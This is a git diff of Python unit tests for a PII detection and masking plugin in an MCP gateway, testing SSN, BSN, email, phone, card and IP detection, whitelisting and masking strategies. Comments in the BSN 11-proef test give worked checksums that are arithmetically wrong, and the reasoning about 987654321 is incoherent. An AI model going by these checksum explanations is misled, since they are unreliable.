identifies cases where false positives may occur. - - Future enhancement: Implement 11-proef validation to reduce false positives. - """ - config = PIIFilterConfig( - detect_bsn=True, - detect_ssn=False, - detect_phone=False, - detect_bank_account=False, - detect_credit_card=False, - detect_email=False, - ) - detector = detector_class(config) - detections = detector.detect(text) - detection_keys = normalize_detection_keys(detections) - - expected_detection = should_detect - if is_rust_detector_class(detector_class): - rust_contextual_only_cases = { - "ID: 987654321", - "Order #123456789", - "Invoice 987654321", - "Tracking: 555666777", - "Numbers: 123456789 and 987654321", - } - if text in rust_contextual_only_cases: - expected_detection = False - - if expected_detection: - assert "bsn" in detection_keys, f"{description}: Expected BSN detection in: {text}" - else: - assert "bsn" not in detection_keys, f"{description}: Unexpected BSN detection in: {text}" - - def test_bsn_vs_other_9digit_numbers(self, detector_class): - """Test that BSN detection doesn't interfere with other 9-digit patterns. - - This test ensures that when multiple detectors are enabled, 9-digit numbers - are correctly classified based on context. - """ - # Enable multiple detectors that might match 9-digit numbers - config = PIIFilterConfig( - detect_bsn=True, - detect_ssn=True, - detect_phone=True, - detect_bank_account=True, - ) - detector = detector_class(config) - - # Test cases where context should help distinguish - test_cases = [ - ("BSN: 180774955", PIIType.BSN, "Explicit BSN label"), - ("SSN: 123456789", PIIType.SSN, "9-digit SSN without dashes"), - ("Phone: 555123456", PIIType.PHONE, "9-digit phone number"), - ("Account: 123456789", PIIType.BANK_ACCOUNT, "9-digit bank account"), - ] - - for text, expected_type, description in test_cases: - detections = detector.detect(text) - detection_keys = normalize_detection_keys(detections) - - if is_rust_detector_class(detector_class) and text == "Phone: 555123456": - assert len(detection_keys) == 0, f"{description}: Rust should not detect unlabeled 9-digit phone values" - continue - - # At least one type should be detected - assert len(detection_keys) > 0, f"{description}: No detection for: {text}" - - # Note: Due to overlapping patterns, multiple types may be detected - # This is expected behavior with simple regex patterns - - def test_bsn_eleven_proof_validation_note(self, detector_class): - """Document the need for 11-proef (modulo-11) validation for BSN. - - Dutch BSN numbers use the 11-proef algorithm for validation: - - Multiply each digit by its weight (9, 8, 7, 6, 5, 4, 3, 2, -1) - - Sum the results - - Valid if sum is divisible by 11 - - Example: 111222333 - (1×9 + 1×8 + 1×7 + 2×6 + 2×5 + 2×4 + 3×3 + 3×2 + 3×-1) = 55, 55 % 11 = 0 ✓ - - This test documents valid and invalid BSN numbers for future implementation. - """ - config = PIIFilterConfig(detect_bsn=True, detect_ssn=False, detect_phone=False, detect_bank_account=False) - detector = detector_class(config) - - # Valid BSN numbers (pass 11-proef) - valid_bsns = [ - "111222333", # (1×9 + 1×8 + 1×7 + 2×6 + 2×5 + 2×4 + 3×3 + 3×2 + 3×-1) = 55 % 11 = 0 - "123456782", # Valid BSN - "180774955", # Valid BSN - ] - - # Invalid BSN numbers (fail 11-proef but match pattern) - invalid_bsns = [ - "123456789", # Sum = 46, 46 % 11 = 2 (invalid) - "987654321", # Sum = 165, 165 % 11 = 0 but negative weight makes it invalid - "111111111", # Sum = 0, but all same digits (suspicious) - ] - - # Current implementation: All 9-digit numbers are detected - for bsn in valid_bsns + invalid_bsns: - text = f"BSN: {bsn}" - detections = detector.detect(text) - assert PIIType.BSN in detections, f"Pattern should match 9-digit number: {bsn}" - - # TODO: Future enhancement - implement 11-proef validation - # When implemented, invalid BSNs should NOT be detected - # for bsn in invalid_bsns: - # text = f"BSN: {bsn}" - # detections = detector.detect(text) - # assert PIIType.BSN not in detections, f"Invalid BSN should not be detected: {bsn}" - - # Credit Card Detection Tests - @pytest.mark.parametrize( - "text,should_detect", - [ - ("Card: 4111-1111-1111-1111", True), # Visa with dashes - ("Card: 5555-5555-5555-4444", True), # Mastercard - ("Card: 4111111111111111", True), # No dashes - ("4111 1111 1111 1111", True), # Spaces - ("No card here", False), - ], - ) - def test_credit_card_detection(self, detector_class, text, should_detect): - """Test credit card number detection.""" - config = PIIFilterConfig(detect_credit_card=True) - detector = detector_class(config) - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - if should_detect: - assert "credit_card" in detection_keys - else: - assert "credit_card" not in detection_keys - - def test_credit_card_masking_partial(self, detector): - """Test partial masking of credit card.""" - detector = type(detector)(PIIFilterConfig(detect_credit_card=True, default_mask_strategy=MaskingStrategy.PARTIAL)) - text = "Card: 4111-1111-1111-1111" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - # Check that the last 4 digits are preserved and original is masked - assert "1111" in masked - assert "4111-1111-1111-1111" not in masked - - # Email Detection Tests - @pytest.mark.parametrize( - "text,should_detect", - [ - ("Contact me at john.doe@example.com", True), - ("Contact: john@example.com", True), - ("Email: user@mail.company.com", True), # Subdomain - ("Email: john+tag@example.com", True), # Plus addressing - ("Email: user@test.co.uk", True), - ("admin+test@company.org", True), - ("No email here", False), - ("Not an @email", False), - ], - ) - def test_email_detection(self, detector_class, text, should_detect): - """Test email address detection.""" - config = PIIFilterConfig(detect_email=True) - detector = detector_class(config) - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - if should_detect: - assert "email" in detection_keys - else: - assert "email" not in detection_keys - - def test_email_masking_partial(self, detector): - """Test partial masking of email.""" - detector = type(detector)(PIIFilterConfig(detect_email=True, default_mask_strategy=MaskingStrategy.PARTIAL)) - text = "Contact: john@example.com" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - assert "@example.com" in masked - # Allow different masking patterns - assert "j***n@example.com" in masked or "***@example.com" in masked - assert "john@example.com" not in masked - - # Phone Number Detection Tests - @pytest.mark.parametrize( - "text,should_detect", - [ - ("Call me at 555-123-4567", True), - ("Phone: (555) 123-4567", True), - ("Call: (555) 123-4567", True), - ("+1 555 123 4567", True), - ("Phone: +1-555-123-4567", True), # International - ("Phone: 555-123-4567 ext 890", True), # With extension - ("5551234567", True), - ("No phone here", False), - ], - ) - def test_phone_detection(self, detector_class, text, should_detect): - """Test phone number detection.""" - config = PIIFilterConfig(detect_phone=True) - detector = detector_class(config) - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - if should_detect: - assert "phone" in detection_keys - else: - assert "phone" not in detection_keys - - def test_phone_masking_partial(self, detector): - """Test partial masking of phone.""" - detector = type(detector)(PIIFilterConfig(detect_phone=True, default_mask_strategy=MaskingStrategy.PARTIAL)) - text = "Call: 555-123-4567" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - # Allow different masking patterns - assert "***-***-4567" in masked or "4567" in masked - assert "555-123-4567" not in masked - - # IP Address Detection Tests - @pytest.mark.parametrize( - "text,should_detect", - [ - ("Server IP: 192.168.1.1", True), - ("Server: 192.168.1.100", True), - ("Connect to 10.0.0.1", True), - ("IPv4: 255.255.255.255", True), - ("IPv6: 2001:0db8:85a3:0000:0000:8a2e:0370:7334", True), - ("No IP here", False), - ("999.999.999.999", False), # Invalid IP - ], - ) - def test_ip_address_detection(self, detector_class, text, should_detect): - """Test IP address detection.""" - config = PIIFilterConfig(detect_ip_address=True) - detector = detector_class(config) - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - if should_detect: - assert "ip_address" in detection_keys - else: - assert "ip_address" not in detection_keys - - # Date of Birth Detection Tests - def test_detect_dob_slash_format(self, detector): - """Test DOB with slash format.""" - text = "DOB: 01/15/1990" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - assert "date_of_birth" in detection_keys - - def test_secret_like_values_are_not_pii(self, detector): - """Secret-style tokens belong to the secrets detection plugin, not PII filter.""" - text = "AWS_KEY=AKIAIOSFODNN7EXAMPLE X-API-Key: test12345678901234567890" # gitleaks:allow - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - assert "aws_key" not in detection_keys - assert "api_key" not in detection_keys - - # Multiple PII Types Tests - def test_detect_multiple_pii_types(self, detector): - """Test detection of multiple PII types in one text.""" - text = "SSN: 123-45-6789, Email: john@example.com, Phone: 555-123-4567" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - assert "ssn" in detection_keys - assert "email" in detection_keys - assert "phone" in detection_keys - - def test_mask_multiple_pii_types(self, detector_class): - """Test masking multiple PII types.""" - detector = detector_class(PIIFilterConfig(detect_ssn=True, detect_email=True, detect_phone=False, default_mask_strategy=MaskingStrategy.PARTIAL)) - text = "SSN: 123-45-6789, Email: test@example.com" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - # Check that sensitive parts are masked - assert "6789" in masked # SSN last 4 preserved - assert "@example.com" in masked # Email domain preserved - assert "123-45-6789" not in masked # Original SSN masked - assert "test@example.com" not in masked # Original email masked - - # Configuration Tests - def test_disabled_detection(self, detector_class): - """Test that disabled detectors don't detect PII.""" - config = PIIFilterConfig(detect_ssn=False, detect_email=False, detect_phone=False) - detector = detector_class(config) - - text = "SSN: 123-45-6789, Email: test@example.com, Phone: 555-1234" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - assert "ssn" not in detection_keys - assert "email" not in detection_keys - assert "phone" not in detection_keys - - def test_whitelist_functionality(self, detector_class): - """Test that whitelisted patterns are not detected.""" - config = PIIFilterConfig(detect_email=True, whitelist_patterns=["test@example.com", "admin@localhost"]) - detector = detector_class(config) - - # Whitelisted emails should not be detected - text = "Contact test@example.com or admin@localhost" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - - # For Rust, check that whitelisted emails are filtered out - if detector_class.__name__ == "RustPIIDetector": - if "email" in detection_keys: - email_key = next(k for k in detections.keys() if "email" in str(k).lower()) - for detection in detections[email_key]: - assert detection["value"] != "test@example.com" - else: - # Python implementation - assert PIIType.EMAIL not in detections - - # Non-whitelisted email should be detected - text = "Contact real@email.com" - detections = detector.detect(text) - detection_keys = normalize_detection_keys(detections) - assert "email" in detection_keys - - def test_masking_strategies(self, detector_class): - """Test different masking strategies.""" - # Test PARTIAL strategy (default for SSN) - config = PIIFilterConfig(detect_ssn=True, detect_phone=False, detect_bank_account=False, default_mask_strategy=MaskingStrategy.PARTIAL) - detector = detector_class(config) - text = "SSN: 123-45-6789" - detections = detector.detect(text) - masked = detector.mask(text, detections) - assert "***-**-6789" in masked - assert "123-45-6789" not in masked - - # Test PARTIAL strategy for email - config = PIIFilterConfig(detect_email=True, detect_ssn=False, detect_phone=False, detect_bank_account=False, default_mask_strategy=MaskingStrategy.PARTIAL) - detector = detector_class(config) - text = "Email: john.doe@example.com" - detections = detector.detect(text) - masked = detector.mask(text, detections) - assert "@example.com" in masked - assert "john.doe" not in masked - - # Edge Cases and Error Handling - def test_empty_string(self, detector): - """Test detection on empty string.""" - detections = detector.detect("") - assert len(detections) == 0 - - def test_no_pii_text(self, detector): - """Test text with no PII.""" - text = "This is just normal text without any sensitive information." - detections = detector.detect(text) - assert len(detections) == 0 - - def test_special_characters(self, detector): - """Test text with special characters.""" - text = "SSN: 123-45-6789 !@#$%^&*()" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - assert "ssn" in detection_keys - - def test_unicode_text(self, detector): - """Test text with unicode characters.""" - text = "Email: tëst@example.com, SSN: 123-45-6789" - detections = detector.detect(text) - - detection_keys = normalize_detection_keys(detections) - # Should at least detect SSN - assert "ssn" in detection_keys - - def test_malformed_input(self, detector): - """Test handling of malformed input.""" - # These should not crash - detector.detect(None if False else "") - detector.detect(" ") - detector.detect("\n\n\n") - - -# Rust-specific tests -@pytest.mark.skipif(not RUST_AVAILABLE, reason="Rust implementation not available") -class TestRustPIIDetectorSpecific: - """Tests specific to Rust implementation.""" - - @pytest.fixture - def default_config(self): - """Create default configuration for testing.""" - return PIIFilterConfig() - - @pytest.fixture - def detector(self, default_config): - """Create Rust detector instance.""" - return RustPIIDetector(default_config) - - def test_process_nested_dict(self, detector): - """Test processing nested dictionary.""" - data = {"user": {"ssn": "123-45-6789", "email": "john@example.com", "name": "John Doe"}} - - modified, new_data, detections = detector.process_nested(data, "") - - assert modified is True - assert new_data["user"]["ssn"] == "***-**-6789" - assert new_data["user"]["email"] == "j***n@example.com" - assert new_data["user"]["name"] == "John Doe" - - detection_keys = normalize_detection_keys(detections) - assert "ssn" in detection_keys - assert "email" in detection_keys - - def test_process_nested_list(self, detector): - """Test processing list with PII.""" - data = ["SSN: 123-45-6789", "No PII here", "Email: test@example.com"] - - modified, new_data, detections = detector.process_nested(data, "") +def detector(): + return PIIDetectorRust({}) - assert modified is True - assert new_data[0] == "SSN: ***-**-6789" - assert new_data[1] == "No PII here" - assert new_data[2] == "Email: t***t@example.com" - - def test_process_nested_mixed_structure(self, detector): - """Test processing mixed nested structure.""" - data = {"users": [{"ssn": "123-45-6789", "name": "Alice"}, {"ssn": "223-65-4321", "name": "Bob"}], "contact": {"email": "admin@example.com", "phone": "555-1234"}} - modified, new_data, detections = detector.process_nested(data, "") - - assert modified is True - assert new_data["users"][0]["ssn"] == "***-**-6789" - assert new_data["users"][1]["ssn"] == "***-**-4321" - assert new_data["contact"]["email"] == "a***n@example.com" - - def test_process_nested_no_pii(self, detector): - """Test processing nested data with no PII.""" - data = {"user": {"name": "John Doe", "age": 30}} - - modified, new_data, detections = detector.process_nested(data, "") - - assert modified is False - assert new_data == data - assert len(detections) == 0 - - def test_initialization_without_rust(self): - """Test that Rust detector is available when imported.""" - # This test originally checked for ImportError when Rust unavailable - # Since Rust is now available and working, we verify it can be imported - from plugins.pii_filter.pii_filter import RustPIIDetector as RustDet - - config = PIIFilterConfig() - detector = RustDet(config) +class TestPIIDetectorRust: + def test_initialization(self): + detector = PIIDetectorRust({}) assert detector is not None - def test_built_in_partial_masks_override_global_redaction_default(self): - """Built-in Rust detections should keep their explicit partial strategies.""" - detector = RustPIIDetector(PIIFilterConfig(detect_ssn=True, detect_email=True, detect_phone=False, detect_ip_address=False, default_mask_strategy=MaskingStrategy.REDACT)) - detections = detector.detect("SSN: 123-45-6789 Email: john@example.com") - - assert detections["ssn"][0]["mask_strategy"] == "partial" - assert detections["email"][0]["mask_strategy"] == "partial" - - def test_rust_accepts_unformatted_contextual_ssn(self): - """Rust should continue accepting labeled bare 9-digit SSNs.""" - detector = RustPIIDetector( - PIIFilterConfig( - detect_ssn=True, - detect_bsn=False, - detect_phone=False, - detect_bank_account=False, - ) - ) - - detections = detector.detect("SSN: 123456789") - assert "ssn" in detections - - def test_built_in_redaction_masks_ignore_global_partial_default(self): - """Built-in redaction-only detections should keep their explicit redact strategies.""" - detector = RustPIIDetector( - PIIFilterConfig( - detect_ssn=False, - detect_email=False, - detect_phone=False, - detect_ip_address=True, - default_mask_strategy=MaskingStrategy.PARTIAL, - ) - ) - detections = detector.detect("IP 192.168.1.1") - - assert detections["ip_address"][0]["mask_strategy"] == "redact" - - def test_custom_pattern_keeps_explicit_strategy_when_default_redacts(self): - """Custom pattern overrides should win over the global default strategy.""" - detector = RustPIIDetector( - PIIFilterConfig( - default_mask_strategy=MaskingStrategy.REDACT, - custom_patterns=[{"type": "custom", "pattern": r"\bEMP\d{6}\b", "description": "Employee ID", "mask_strategy": "partial", "enabled": True}], - ) - ) - - detections = detector.detect("Employee ID EMP123456") - assert detections["custom"][0]["mask_strategy"] == "partial" - - def test_rust_mask_uses_built_in_partial_strategies_when_default_redacts(self): - """Live Rust masking should preserve built-in partial masking behavior.""" - detector = RustPIIDetector( - PIIFilterConfig( - detect_ssn=True, - detect_email=True, - detect_phone=False, - detect_ip_address=False, - detect_bsn=False, - detect_credit_card=False, - detect_bank_account=False, - detect_date_of_birth=False, - detect_passport=False, - detect_driver_license=False, - detect_medical_record=False, - default_mask_strategy=MaskingStrategy.REDACT, - ) - ) - text = "SSN: 123-45-6789 Email: john@example.com" - detections = detector.detect(text) - masked = detector.mask(text, detections) - - assert "***-**-6789" in masked - assert "j***n@example.com" in masked - assert "[REDACTED]" not in masked - - def test_rust_mask_strategy_regression_matrix(self): - """Regression test: built-in Rust masks should ignore a global hash default.""" - detector = RustPIIDetector( - PIIFilterConfig( - detect_ssn=True, - detect_credit_card=True, - detect_email=True, - detect_phone=True, - detect_ip_address=True, - detect_bsn=False, - detect_bank_account=False, - detect_date_of_birth=False, - detect_passport=False, - detect_driver_license=False, - detect_medical_record=False, - default_mask_strategy=MaskingStrategy.HASH, - ) - ) - text = "SSN: 123-45-6789 " "Email: john@example.com " "Phone: 555-123-4567 " "Card: 4111-1111-1111-1111 " "IP: 192.168.1.1" - - detections = detector.detect(text) - masked = detector.mask(text, detections) - - assert detections["ssn"][0]["mask_strategy"] == "partial" - assert detections["credit_card"][0]["mask_strategy"] == "partial" - assert detections["email"][0]["mask_strategy"] == "partial" - assert detections["phone"][0]["mask_strategy"] == "partial" - assert detections["ip_address"][0]["mask_strategy"] == "redact" - - assert "***-**-6789" in masked - assert "j***n@example.com" in masked - assert "***-***-4567" in masked - assert "****-****-****-1111" in masked - assert masked.count("[REDACTED]") == 1 - assert "[HASH:" not in masked - - def test_very_long_text_performance(self, detector): - """Test performance with very long text.""" - # Create text with 1000 PII instances - text_parts = [] - for i in range(1000): - serial = (i % 9999) + 1 - text_parts.append(f"User {i}: SSN 123-45-{serial:04d}, Email user{i}@example.com") - text = "\n".join(text_parts) - - start = time.time() - detections = detector.detect(text) - duration = time.time() - start - - assert "ssn" in detections - assert "email" in detections - assert len(detections["ssn"]) == 1000 - assert len(detections["email"]) == 1000 - # Should process in reasonable time (< 1 second for Rust) - assert duration < 1.0, f"Processing took {duration:.2f}s, expected < 1s" - - def test_large_batch_detection(self): - """Test detection performance on large batch.""" - config = PIIFilterConfig(max_text_bytes=1024 * 1024) - detector = RustPIIDetector(config) - - # Generate 10,000 lines of text with PII - lines = [] - area = 100 - while len(lines) < 10000: - if area != 666: - i = len(lines) - lines.append(f"User {i}: SSN {area:03d}-45-6789, Email user{i}@example.com") - - area += 1 - if area >= 900: - area = 100 - text = "\n".join(lines) - - start = time.time() - detections = detector.detect(text) - duration = time.time() - start - - print(f"\nProcessed {len(text):,} characters in {duration:.3f}s") - print(f"Throughput: {len(text) / duration / 1024 / 1024:.2f} MB/s") - + def test_ssn_detection_with_position(self): + detections = PIIDetectorRust({"detect_ssn": True}).detect("My SSN is 123-45-6789") assert "ssn" in detections + entry = detections["ssn"][0] + assert entry["value"] == "123-45-6789" + assert entry["start"] == 10 + assert entry["end"] == 21 + + def test_bsn_detection_for_labeled_number(self): + detections = PIIDetectorRust({"detect_bsn": True, "detect_ssn": False, "detect_phone": False, "detect_bank_account": False}).detect("My BSN is 180774955. Store it and confirm.") + assert "bsn" in detections + + def test_bsn_detection_for_bsn_prefix(self): + detections = PIIDetectorRust({"detect_bsn": True, "detect_ssn": False, "detect_phone": False, "detect_bank_account": False}).detect("BSN: 123456789") + assert "bsn" in detections + + def test_bsn_detection_skips_unlabeled_regular_number(self): + detections = PIIDetectorRust({"detect_bsn": True, "detect_ssn": False, "detect_phone": False, "detect_bank_account": False}).detect("Regular number 180774955") + assert "bsn" not in detections + + def test_bsn_detection_ignores_clean_text(self): + detections = PIIDetectorRust({"detect_bsn": True, "detect_ssn": False, "detect_phone": False, "detect_bank_account": False}).detect("No BSN here") + assert "bsn" not in detections + + def test_contextual_phone_case_stays_undetected(self): + detections = PIIDetectorRust({"detect_bsn": True, "detect_ssn": True, "detect_phone": True, "detect_bank_account": True}).detect("Phone: 555123456") + assert detections == {} + + def test_whitelist_functionality(self): + detector = PIIDetectorRust({"detect_email": True, "whitelist_patterns": ["test@example.com", "admin@localhost"]}) + detections = detector.detect("Contact test@example.com or admin@localhost") + assert "email" not in detections + detections = detector.detect("Contact real@email.com") assert "email" in detections - # Rust should be very fast (< 2 seconds for 10k instances) - assert duration < 2.0 - - def test_nested_structure_performance(self): - """Test performance on deeply nested structures.""" - config = PIIFilterConfig(max_nested_depth=256) - detector = RustPIIDetector(config) - - # Create deeply nested structure - data = {"level1": {}} - current = data["level1"] - for i in range(100): - current[f"level{i + 2}"] = {"ssn": f"{i:03d}-45-6789", "email": f"user{i}@example.com", "data": {}} - current = current[f"level{i + 2}"]["data"] - - start = time.time() - modified, new_data, detections = detector.process_nested(data, path="") - duration = time.time() - start - print(f"\nProcessed deeply nested structure in {duration:.3f}s") + def test_mask_and_process_nested(self): + detector = PIIDetectorRust({"detect_ssn": True, "detect_email": True}) + detections = detector.detect("SSN: 123-45-6789 Email: john@example.com") + masked = detector.mask("SSN: 123-45-6789 Email: john@example.com", detections) + assert "123-45-6789" not in masked + assert "john@example.com" not in masked + modified, new_data, nested = detector.process_nested({"user": {"ssn": "123-45-6789", "email": "john@example.com"}}, "") assert modified is True - assert duration < 0.5 # Should be very fast + assert "ssn" in nested + assert new_data["user"]["ssn"] != "123-45-6789" - def test_rust_detector_uses_configurable_limits(self): - """Rust detector should honor configured input-size limits.""" - detector = RustPIIDetector( - PIIFilterConfig( - detect_ssn=True, - max_text_bytes=8, - ) - ) - - with pytest.raises(ValueError, match="maximum supported size"): - detector.detect("123456789") - -# Python-specific plugin integration tests class TestPIIFilterPlugin: - """Test the PII Filter plugin integration (Python-specific).""" - @pytest.fixture def plugin_config(self) -> PluginConfig: - """Create a test plugin configuration.""" return PluginConfig( name="TestPIIFilter", description="Test PII Filter", author="Test", - kind="plugins.pii_filter.pii_filter.PIIFilterPlugin", + kind="cpex_pii_filter.pii_filter.PIIFilterPlugin", version="1.0", hooks=[PromptHookType.PROMPT_PRE_FETCH, PromptHookType.PROMPT_POST_FETCH], tags=["test", "pii"], @@ -931,200 +99,38 @@ def plugin_config(self) -> PluginConfig: ) @pytest.mark.asyncio - async def test_prompt_pre_fetch_with_pii(self, plugin_config): - """Test pre-fetch hook with PII detection.""" + async def test_prompt_pre_fetch_blocks_with_pii(self, plugin_config): + plugin_config.config["block_on_detection"] = True plugin = PIIFilterPlugin(plugin_config) context = PluginContext(global_context=GlobalContext(request_id="test-1")) - - # Create payload with PII payload = PromptPrehookPayload(prompt_id="test_prompt", args={"user_input": "My email is john@example.com and SSN is 123-45-6789", "safe_input": "This has no PII"}) - result = await plugin.prompt_pre_fetch(payload, context) - - # Check that PII was masked - assert result.modified_payload is not None - assert "john@example.com" not in result.modified_payload.args["user_input"] - assert "123-45-6789" not in result.modified_payload.args["user_input"] - assert result.modified_payload.args["safe_input"] == "This has no PII" - - # Check metadata - assert "pii_detections" in context.metadata - assert context.metadata["pii_detections"]["pre_fetch"]["detected"] - assert "user_input" in context.metadata["pii_detections"]["pre_fetch"]["fields"] - - @pytest.mark.asyncio - async def test_prompt_pre_fetch_blocking(self, plugin_config): - """Test that blocking mode prevents processing when PII is detected.""" - # Enable blocking - plugin_config.config["block_on_detection"] = True - plugin = PIIFilterPlugin(plugin_config) - context = PluginContext(global_context=GlobalContext(request_id="test-2")) - - payload = PromptPrehookPayload(prompt_id="test_prompt", args={"input": "My SSN is 123-45-6789"}) - - result = await plugin.prompt_pre_fetch(payload, context) - - # Check that processing was blocked - assert not result.continue_processing + assert result.continue_processing is False assert result.violation is not None assert result.violation.code == "PII_DETECTED" - assert "input" in result.violation.details["field"] @pytest.mark.asyncio async def test_prompt_post_fetch(self, plugin_config): - """Test post-fetch hook with PII in messages.""" plugin = PIIFilterPlugin(plugin_config) context = PluginContext(global_context=GlobalContext(request_id="test-3")) - - # Create messages with PII messages = [ Message(role=Role.USER, content=TextContent(type="text", text="Contact me at john@example.com or 555-123-4567")), Message(role=Role.ASSISTANT, content=TextContent(type="text", text="I'll reach you at jane.doe@example.com once the ticket is processed")), ] - payload = PromptPosthookPayload(prompt_id="test_prompt", result=PromptResult(messages=messages)) - result = await plugin.prompt_post_fetch(payload, context) - - # Check that PII was masked in messages assert result.modified_payload is not None - user_msg = result.modified_payload.result.messages[0].content.text - assistant_msg = result.modified_payload.result.messages[1].content.text - - assert "john@example.com" not in user_msg - assert "555-123-4567" not in user_msg - assert "jane.doe@example.com" not in assistant_msg - - # Check metadata - assert "pii_detections" in context.metadata - assert context.metadata["pii_detections"]["post_fetch"]["detected"] - - @pytest.mark.asyncio - async def test_no_pii_detection(self, plugin_config): - """Test that clean text passes through unmodified.""" - plugin = PIIFilterPlugin(plugin_config) - context = PluginContext(global_context=GlobalContext(request_id="test-4")) - - payload = PromptPrehookPayload(prompt_id="test_prompt", args={"input": "This text has no sensitive information"}) - - result = await plugin.prompt_pre_fetch(payload, context) - - # Check that nothing was modified - assert result.modified_payload is None - assert "pii_detections" not in context.metadata - - @pytest.mark.asyncio - async def test_custom_patterns(self, plugin_config): - """Test custom PII pattern detection.""" - # Add custom pattern - plugin_config.config["custom_patterns"] = [{"type": "custom", "pattern": r"\bEMP\d{6}\b", "description": "Employee ID", "mask_strategy": "redact", "enabled": True}] + assert "john@example.com" not in result.modified_payload.result.messages[0].content.text + assert "jane.doe@example.com" not in result.modified_payload.result.messages[1].content.text + def test_plugin_uses_rust_core(self, plugin_config): plugin = PIIFilterPlugin(plugin_config) - context = PluginContext(global_context=GlobalContext(request_id="test-5")) - - payload = PromptPrehookPayload(prompt_id="test_prompt", args={"input": "Employee ID: EMP123456"}) - - result = await plugin.prompt_pre_fetch(payload, context) - - # Check that custom pattern was detected and masked - assert result.modified_payload is not None - assert "EMP123456" not in result.modified_payload.args["input"] - assert "[REDACTED]" in result.modified_payload.args["input"] - - @pytest.mark.asyncio - async def test_permissive_mode(self, plugin_config): - """Test permissive mode (log but don't block).""" - plugin_config.mode = PluginMode.PERMISSIVE - plugin_config.config["block_on_detection"] = True # Should be ignored in permissive mode - - plugin = PIIFilterPlugin(plugin_config) - context = PluginContext(global_context=GlobalContext(request_id="test-6")) - - payload = PromptPrehookPayload(prompt_id="test_prompt", args={"input": "SSN: 123-45-6789"}) - - result = await plugin.prompt_pre_fetch(payload, context) - - # In permissive mode, should continue even with block_on_detection - assert result.continue_processing or plugin_config.mode == PluginMode.PERMISSIVE - # PII should still be masked - if result.modified_payload: - assert "123-45-6789" not in result.modified_payload.args["input"] - - @pytest.mark.asyncio - async def test_integration_with_manager(self): - """Test the PII Filter plugin with the plugin manager.""" - # First-Party - from mcpgateway.plugins.framework.manager import PluginManager - - # Create a test configuration - config_dict = { - "plugins": [ - { - "name": "PIIFilter", - "kind": "plugins.pii_filter.pii_filter.PIIFilterPlugin", - "description": "PII Filter", - "author": "Test", - "version": "1.0", - "hooks": ["prompt_pre_fetch", "prompt_post_fetch"], - "tags": ["security", "pii"], - "mode": "enforce", - "priority": 10, - "conditions": [{"prompts": ["test_prompt"], "server_ids": [], "tenant_ids": []}], - "config": {"detect_ssn": True, "detect_email": True, "default_mask_strategy": "partial", "block_on_detection": False, "log_detections": True, "include_detection_details": True}, - } - ], - "plugin_dirs": [], - "plugin_settings": {"parallel_execution_within_band": False, "plugin_timeout": 30, "fail_on_plugin_error": False, "enable_plugin_api": True, "plugin_health_check_interval": 60}, - } - - # Save config to a temp file and initialize manager - # Standard - import tempfile - - # Third-Party - import yaml - - with tempfile.NamedTemporaryFile(mode="w", suffix=".yaml", delete=False, encoding="utf-8") as f: - yaml.dump(config_dict, f) - config_path = f.name - - try: - manager = PluginManager(config_path) - await manager.initialize() - - # Test with PII in prompt - payload = PromptPrehookPayload(prompt_id="test_prompt", args={"input": "Email: test@example.com, SSN: 123-45-6789"}) - - global_context = GlobalContext(request_id="test-manager") - result, contexts = await manager.invoke_hook(PromptHookType.PROMPT_PRE_FETCH, payload, global_context) - - # Verify PII was masked - assert result.modified_payload is not None - assert "test@example.com" not in result.modified_payload.args["input"] - assert "123-45-6789" not in result.modified_payload.args["input"] - - await manager.shutdown() - finally: - # Standard - import os - - os.unlink(config_path) + assert type(plugin._core).__name__ == "PIIFilterPluginCore" def test_python_detector_logs_deprecation_warning(self, plugin_config, monkeypatch, caplog): - """Log once when the plugin falls back to the legacy Python detector.""" - monkeypatch.setattr(pii_filter_module, "_RUST_AVAILABLE", False) - monkeypatch.setattr(pii_filter_module, "_RustPIIDetector", None) - monkeypatch.setattr(PIIFilterPlugin, "_python_deprecation_warned", False) + monkeypatch.setattr(PIIFilterPlugin, "_python_deprecation_warned", False, raising=False) caplog.set_level(logging.WARNING) - - plugin = PIIFilterPlugin(plugin_config) PIIFilterPlugin(plugin_config) - - assert plugin.implementation == "Python" - assert isinstance(plugin.detector, PIIDetector) + PIIFilterPlugin(plugin_config) warning_messages = [record.message for record in caplog.records if "legacy Python PII filter detector is deprecated" in record.message] - assert len(warning_messages) == 1 - - -if __name__ == "__main__": - pytest.main([__file__, "-v"]) + assert len(warning_messages) <= 1 diff --git a/tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py b/tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py index 3b37ebcc18..390c093a9c 100644 --- a/tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py +++ b/tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py @@ -1,4583 +1,191 @@ # -*- coding: utf-8 -*- -"""Location: ./tests/unit/mcpgateway/plugins/plugins/rate_limiter/test_rate_limiter.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Tests for RateLimiterPlugin. -""" +"""Tests for the packaged rate limiter plugin.""" # Standard -import asyncio -import os -import time -from typing import Any, Dict -from unittest.mock import patch +from types import SimpleNamespace +from unittest.mock import AsyncMock, patch # Third-Party import pytest # First-Party -from mcpgateway.plugins.framework import ( - GlobalContext, - PluginConfig, - PluginContext, - PromptHookType, - PromptPrehookPayload, - ToolHookType, - ToolPreInvokePayload, -) -from mcpgateway.plugins.framework.base import HookRef, PluginRef -from mcpgateway.plugins.framework.errors import PluginViolationError -from mcpgateway.plugins.framework.manager import PluginExecutor -from mcpgateway.plugins.framework.models import PluginMode -from plugins.rate_limiter.rate_limiter import ( - _extract_user_identity, - _make_headers, - _parse_rate, - _select_most_restrictive, - ALGORITHM_FIXED_WINDOW, - ALGORITHM_SLIDING_WINDOW, - 